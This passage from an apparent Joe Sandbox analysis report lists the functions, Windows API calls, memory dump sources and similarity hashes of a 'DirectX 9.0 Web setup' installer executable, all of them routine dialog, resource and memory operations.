                                                                                                • Opcode Fuzzy Hash: 4b52c76db2cf62ff621c8a08fa6ba7fb40a7dbd169611f4951299f618a72bbfa
                                                                                                • Instruction Fuzzy Hash: 0DF0F672505A542EF7331A2D8C88E7BBFDCDB872A1F040189F6C092081DAA95C408E72
                                                                                                Function 010017B1 Relevance: 7.5, APIs: 5, Instructions: 40windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,0000083E), ref: 010017E3
                                                                                                • GetDesktopWindow.USER32 ref: 010017EB
                                                                                                • LoadStringA.USER32(?,00000000,00000200,?), ref: 01001816
                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 0100182B
                                                                                                • MessageBeep.USER32(000000FF), ref: 01001833
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1273765764-0
                                                                                                • Opcode ID: 52c35957c5d6308ac9e5b8dfae4ee701d5fa30329f22752cf5df4afad45c4fb5
                                                                                                • Instruction ID: dbb55cd7090eff77bfa65d7c4eba401a97cfafb7d2c079e3b47d5aa362050595
                                                                                                • Opcode Fuzzy Hash: 52c35957c5d6308ac9e5b8dfae4ee701d5fa30329f22752cf5df4afad45c4fb5
                                                                                                • Instruction Fuzzy Hash: D601283140024AABFB265FA4DC4CAEA3AB8BB04745F044564BAA9950E5CBB9CB51CB91
                                                                                                Function 010041CD Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(?,DirectX 9.0 Web setup), ref: 010041E9
                                                                                                • MessageBeep.USER32(00000000), ref: 010043C0
                                                                                                • MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,?), ref: 01004439
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$BeepVersion
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2519184315-3102400635
                                                                                                • Opcode ID: b07f304ec63bc814189986a0719c39693d795c7fab61f747b2dc9ea387807f31
                                                                                                • Instruction ID: 4e04eab14abf842a0a3c42a681093732e4e7dc93d7d51bc9d8c979872b2e196d
                                                                                                • Opcode Fuzzy Hash: b07f304ec63bc814189986a0719c39693d795c7fab61f747b2dc9ea387807f31
                                                                                                • Instruction Fuzzy Hash: A971DB30A04209DBEB77DF68DA40BAD7BE9FB44304F11806AEBD1C61E5DB76A045CB58
                                                                                                Function 01002E6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01002E89
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,010059A0), ref: 01002E92
                                                                                                • LockResource.KERNEL32(00000000,?,010059A0), ref: 01002E99
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$LoadLock$Sizeof
                                                                                                • String ID: CABINET
                                                                                                • API String ID: 1933721802-1940454314
                                                                                                • Opcode ID: fee46d4037bcf492714a1928356b3615369b2f8f05e7677fcc6bc0c80cc05536
                                                                                                • Instruction ID: f41c840c6a8244764c1701102c9fef1f774684e0028f7af970c8500be1e35917
                                                                                                • Opcode Fuzzy Hash: fee46d4037bcf492714a1928356b3615369b2f8f05e7677fcc6bc0c80cc05536
                                                                                                • Instruction Fuzzy Hash: 3EE08C71B42310ABE326ABB1AC1DB8B3A58AB19751F000416F286DA0C4CBBA84008791
                                                                                                Function 01003A7A Relevance: 6.3, APIs: 5, Instructions: 51memorystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003A87
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AAC
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AB6
                                                                                                • LocalFree.KERNEL32(00000000,000004B5,00000000,00000000,00000010,00000000,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AD4
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                • lstrcpyA.KERNEL32(00000000,00000000,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AE3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Local$Alloc$FreeMessagelstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3247521446-0
                                                                                                • Opcode ID: 1c252e24ed27c8a3c89f68d47637d6c558a56de84ee84e0859bd78fbfeca7fcd
                                                                                                • Instruction ID: be99e61ba3297938531ad782b9381de073ce5d9bd08aee7874bfad80a1221b46
                                                                                                • Opcode Fuzzy Hash: 1c252e24ed27c8a3c89f68d47637d6c558a56de84ee84e0859bd78fbfeca7fcd
                                                                                                • Instruction Fuzzy Hash: FB015EB1740305AFE3239F649C85E6A76ACFB55755F014425F3C5A6084D6BA88508B24
                                                                                                Function 0100288F Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 010028B3
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028C5
                                                                                                • DispatchMessageA.USER32(?), ref: 010028DA
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                • String ID:
                                                                                                • API String ID: 2776232527-0
                                                                                                • Opcode ID: a56fe23e79c58ba78c4517e1b38a4719a0d3d39021dba4458620cccc97c02652
                                                                                                • Instruction ID: 9019c9b4a7aa9e97d921e157395a9add37c16d99774a71cba0f29cd9f7e0b4b7
                                                                                                • Opcode Fuzzy Hash: a56fe23e79c58ba78c4517e1b38a4719a0d3d39021dba4458620cccc97c02652
                                                                                                • Instruction Fuzzy Hash: E1012176D01219BABF218A999D48CEB7ABCEA85654F14016ABA41E2084E634D600C771
                                                                                                Function 01005A5E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCommandLineA.KERNEL32 ref: 01005A65
                                                                                                • GetStartupInfoA.KERNEL32(?), ref: 01005AA4
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 01005ABF
                                                                                                • ExitProcess.KERNEL32 ref: 01005ACC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                • String ID:
                                                                                                • API String ID: 2164999147-0
                                                                                                • Opcode ID: 2f495b8465459854e2a67ff318fe6398d5d3dc67db26c03b0204fa68f66db23f
                                                                                                • Instruction ID: 3b7e2d213fbb4e8bb4e10cefaec2fc303bbd8eb181140a99f14634f11779781f
                                                                                                • Opcode Fuzzy Hash: 2f495b8465459854e2a67ff318fe6398d5d3dc67db26c03b0204fa68f66db23f
                                                                                                • Instruction Fuzzy Hash: 07017C718043995AFB734BAC8C897FA7BE89F1B211F2404C5E9C1922C6C66884C28BA5